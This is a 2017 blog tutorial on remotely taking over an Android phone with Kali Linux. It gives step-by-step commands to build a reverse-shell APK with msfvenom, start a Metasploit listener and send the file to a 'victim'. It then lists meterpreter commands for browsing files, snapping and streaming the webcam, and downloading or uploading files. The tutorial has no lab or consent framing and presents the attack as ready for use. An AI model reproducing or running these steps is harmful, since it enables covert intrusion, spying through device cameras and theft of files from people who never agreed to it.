top of page

Hacking an android phone remotely (Kali Linux)

  • Sajen Maharjan
  • Jul 22, 2017
  • 2 min read

Hello everyone ! Today in this post I will be explaining you How to hack an android phone remotely using Kali Linux.

I will show you the step by step process to do it. I will also explain you about each command.

First of all we have to create a payload. For that open a terminal and write the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your local ip> LPORT=<port> R > filename.apk

In the above command we created a payload android/meterpreter/reverse_tcp. Then you have to set your IP address at the LHOST. Example: LHOST=192.167.1.6

If you don't know your local IP address then open a terminal and type ifconfig. You will get your IP.

Then in LPORT you have to set a port. You can put any port you like. Examle:LPORT=4444

Then you will see R > filename.apk where you set the filename of the apk file you create.

After typing all the commands hit enter and the payload will be created.

Now, to set the listener, open another terminal and type msfconsole and hit enter for the metasploit. Then type following command:

use exploit/multi/handler

And then type,

set PAYLOAD android/meterpreter/reverse_tcp

And then type: show options

This will show everything that is required before exploiting.

Then you have to set the host for that type: set LHOST <IP address>

Then if the port is already set, then you can go ahead without doing anything else set in manually by typing: set PORT <port>

Then, finally type the command: exploit

After doing all this, send the file to victim. Once the victim opens the file a meterpreter session will start in your terminal.

Now you have access to victims device.

-To see all the files of that device, type: cd / and then type: ls

-To click a photo from the device's webcam type: webcam_snap

-To stream a live video type: webcam_stream

-To download files from victim's device type: download <filename>

-To upload files to the device: upload <filename>

-There are many more commands. You can search in on Google too.

Keep Coming For More !

 
 
 

Comments


Featured Posts
Check back soon
Once posts are published, you’ll see them here.
Recent Posts
Archive
Search By Tags
Follow Us
  • Facebook Basic Square
  • Twitter Basic Square
  • Google+ Basic Square
bottom of page